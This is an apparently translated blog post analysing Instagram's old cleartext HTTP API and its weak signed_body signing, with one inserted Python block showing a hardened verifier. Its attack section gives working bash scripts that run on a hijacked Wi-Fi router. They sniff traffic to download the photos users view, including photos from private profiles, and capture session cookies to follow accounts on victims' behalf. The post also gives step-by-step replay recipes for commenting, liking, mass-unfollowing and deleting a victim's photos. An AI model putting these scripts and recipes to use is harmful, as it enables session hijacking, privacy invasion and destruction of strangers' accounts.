
How to Instagram the dirty way, or keep an eye on your cookies



Hey, guess the riddle! Which startup was sold in 2012 for a billion dollars? Which social network did our spare president move into last year? Which social network tried to declare user-generated content its own property?

That's right! Today we're talking about Instagram.

For all the media attention Instagram gets, I have never come across a security analysis of it, and there is plenty to analyze. Instagram talks to its servers over plain HTTP (!), and where it does use cryptography, it does so in a very strange way.

Lots of details and a neat DIY hack under the cut.

Research platform


The testing ground for all my experiments is my home router, an Asus RT-N56U running Padavan's custom firmware with the Entware repository. This choice was deliberate. The result of my digging is a few bash scripts (shared below) that can perform some of the things described here completely autonomously, without drawing much attention to themselves.

In addition, the router plays the role of a free Wi-Fi hotspot: exactly what you might find in your favourite cafe or at a sneaky neighbour's.

Traffic on the router was written to a network share with tcpdump:

    tcpdump -i br0 src <ip> and port 80 -w /opt/tmp/dump.dmp

and then opened from that share in Wireshark on the PC. Wireshark's "Follow TCP Stream" function is very convenient for reconstructing the HTTP dialogue between client and server.



To generate my own test POST and GET requests to the Instagram servers, I used the handy Firefox add-on HttpRequester.



Instagram also has a free public API for third-party developers, which works over HTTPS (!) but has a number of limitations, the main one being that you cannot publish a photo through it. I strongly recommend poking around in the developer API; fun stuff...

Communication Protocol


All communication between the client and the server (except for authentication) happens in cleartext, using POST and GET requests.



Recently, to improve security, a signed_body function was added to the protocol: it computes an HMAC-SHA256 over the parameter passed to it and puts the hash into the POST request alongside the parameter itself (see screenshot).

Unfortunately, I never managed to work out the hash generation algorithm before Java ate my brain. The function I pulled out of the Android APK, together with its fixed secret key, I uploaded to pastebin for the curious. If someone figures it out, please share.

The main weakness of the signed_body signing procedure is the small set of variables in the hashed string. For example, a signed_body for a comment will fit any photo on behalf of any user; and to like a photo or delete it, all you need is a hash over the matching media_id.

Now let's look at the most common POST requests to the server:

| Action            | URL                                                   | signed_body parameter |
|-------------------|-------------------------------------------------------|-----------------------|
| Follow (unfollow) | /api/v1/friendships/create (destroy)/{user_id}/       | user_id               |
| Comment           | /api/v1/media/{media_id}/comment/                     | comment_text          |
| Delete comment    | /api/v1/media/{media_id}/comment/{comment_id}/delete/ | comment_id, media_id  |
| Like (unlike)     | /api/v1/media/{media_id}/like (unlike)/               | media_id              |
| Delete            | /api/v1/media/{media_id}/delete/                      | media_id              |

media_id is formed as photo_id + "_" + user_id.
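To show concretely why such a small signed set is a problem, here is an added illustration (not code from the post and not Instagram's own scheme): the weak scheme as described, where the HMAC covers only the parameter JSON, next to a hardened variant that also binds the HTTP method, the request path, the acting account and a timestamp. The key, the account names and the timestamp are constructed; the target id 37343536 is the sample value from the post.

```python
import hashlib
import hmac
import json

DEMO_KEY = b"demo-key-not-the-real-one"  # constructed; the app's real key is not used

def _mac(key: bytes, msg: str) -> str:
    return hmac.new(key, msg.encode(), hashlib.sha256).hexdigest()

def _canon(params: dict) -> str:
    return json.dumps(params, separators=(",", ":"), sort_keys=True)  # stable bytes to hash

def sign_weak(params: dict, key: bytes = DEMO_KEY) -> str:
    # The scheme the post describes: HMAC over the parameter JSON only, sent as '<mac>.<json>'.
    body = _canon(params)
    return _mac(key, body) + "." + body

def verify_weak(signed_body: str, key: bytes = DEMO_KEY):
    mac, _, body = signed_body.partition(".")
    return json.loads(body) if hmac.compare_digest(mac, _mac(key, body)) else None

def sign_bound(method: str, path: str, params: dict, uid: str, ts: int, key: bytes = DEMO_KEY) -> str:
    # Hardened variant (added here, not Instagram's): MAC also covers method, path, acting user and time.
    body = _canon({"_uid": uid, "_ts": ts, **params})
    return _mac(key, f"{method}\n{path}\n{body}") + "." + body

def verify_bound(method: str, path: str, signed_body: str, session_uid: str, now: int,
                 max_age: int = 300, key: bytes = DEMO_KEY):
    mac, _, body = signed_body.partition(".")
    if not hmac.compare_digest(mac, _mac(key, f"{method}\n{path}\n{body}")):
        return None  # tampered, or signed for a different endpoint
    params = json.loads(body)
    if params.get("_uid") != session_uid:
        return None  # signed under one account, presented with another account's cookie
    if abs(now - int(params.get("_ts", 0))) > max_age:
        return None  # captured earlier and replayed later
    return params

def demo() -> dict:
    # Replay checks using the post's example target id 37343536 as sample data.
    target, now = {"user_id": "37343536"}, 1700000000
    create, destroy = "/api/v1/friendships/create/37343536/", "/api/v1/friendships/destroy/37343536/"
    weak = sign_weak(target)
    bound = sign_bound("POST", create, target, "attacker-acct", now)
    return {
        "weak_accepted_anywhere": verify_weak(weak) is not None,
        "bound_ok_on_create": verify_bound("POST", create, bound, "attacker-acct", now) is not None,
        "bound_rejected_on_destroy": verify_bound("POST", destroy, bound, "attacker-acct", now) is None,
        "bound_rejected_other_session": verify_bound("POST", create, bound, "victim-acct", now) is None,
        "bound_rejected_when_stale": verify_bound("POST", create, bound, "attacker-acct", now + 3600) is None,
    }
```

The weak verifier never sees which endpoint or session presents the signature, which is exactly why one captured signed_body serves for create and destroy alike; the bound verifier rejects every one of those reuses.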

Practical Applications


All the attacks described below assume that you have access to the router, or at least to the network traffic (for example, via a passive LAN tap).
Let's start by automatically downloading every photo the user publishes or views (including ones from private profiles).

    #!/bin/bash
    while true
    do
        tcpdump -i br0 port 80 -nn -w - | grep -m 1 -A 1 _7.jpg | awk '{one =$2 ; getline ; print "http://" $2 one ; getline}' | xargs wget -P /opt/tmp/photo
    done


We catch requests for files ending in _7.jpg in all the GET traffic (that is how every full-size Instagram photo ends) and feed them to wget. The photos show up in the photo folder in real time.

Autofollow

Now let's follow our own account on behalf of the user. All we need for that is the user's defenceless cookies flying past over the wire :)

    /opt/home/admin # COOKIE=`tcpdump -i br0 port 80 -nn -w - | grep -m 1 ds_user_id= | awk '{print $2$3$4$5}'` /opt/tmp/curl_follow.sh


We listen to all the HTTP traffic flying by, catch the user's cookies, tidy them up a bit and hand them to the script curl_follow.sh:

    /opt/home/admin # cat /opt/tmp/curl_follow.sh
    #!/bin/bash
    curl -X POST \
      -H "Connection: Keep-Alive" \
      --user-agent "Instagram 3.4.0 Android (17/4.2.1; 240dpi; 480x800; samsung/Samsung; GT-I9100; GT-I9100; smdk4210; en_US)" \
      -b $COOKIE \
      -d "signed_body=08501f85a71be55abfa0d36719f72a27debb2ee769fd2f4ffe086c07ae129f6a.%7B%22user_id%22%3A%2237343536%22%7D&ig_sig_key_version=4" \
      instagram.com/api/v1/friendships/create/37343536/


The beauty of this scenario is that it runs autonomously on the router without any human intervention. Set it up, launch it and admire your growing follower count.

What else can you do?

Leave comments on any photo on behalf of the user:

1. Pre-generate the desired comment from your own account on your phone, on any photo;
2. Catch the resulting POST packet and copy its signed_body field;
3. Build your own packet from the user's cookie, our signed_body and the target media_id.

Like a specific photo on behalf of the user:

1. Pre-generate a signed_body with the desired media_id;
2. Catch the user's cookie;
3. Do everything else as in the follow example.

And, of course, there are these dirty tricks:

Unfollow all the user's friends
- get the ids of the people the user follows, follow them from a throwaway account (thereby learning the signed_body for each user_id), then unfollow them on behalf of the user with the intercepted cookie.

Delete the user's photos
- get the list of the user's media_ids, like them from a third-party account (thereby obtaining a signed_body for each media_id), then delete them using the user's cookie.

Instead of conclusions, a short video demonstration:

Source: https://habr.com/ru/post/166773/
